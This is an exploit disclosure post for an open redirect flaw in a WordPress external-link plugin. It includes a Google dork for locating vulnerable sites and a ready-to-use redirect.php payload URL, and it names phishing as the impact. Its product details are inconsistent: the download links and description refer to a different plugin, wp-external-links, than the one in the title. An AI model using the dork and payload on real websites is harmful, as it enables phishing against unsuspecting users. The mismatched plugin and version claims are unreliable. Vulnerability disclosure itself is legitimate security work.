WordPress WP-JS-External-Link-Info plugin version 2.2.0 suffers from an open redirection vulnerability.
7b8928a35239713b63887fba1e32b196####################################################################
# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : finewebdev.com
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
# Software Information Link : wordpress.org/plugins/wp-external-links/
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
WP External Links (nofollow new tab seo) is open source software.
Manage external and internal links on your site.
####################################################################
# Impact :
***********
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
because the application fails to properly verify user-supplied input.
Exploiting this issue may allow attackers to redirect users to arbitrary web sites
and conduct phishing attacks; other attacks are also possible.
WordPress Plugin WP Js External Link Info version 1.21 - 1.81 and 2.2.0 is
vulnerable; prior versions may also be affected.
####################################################################
# Open Redirection Exploit :
*************************
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################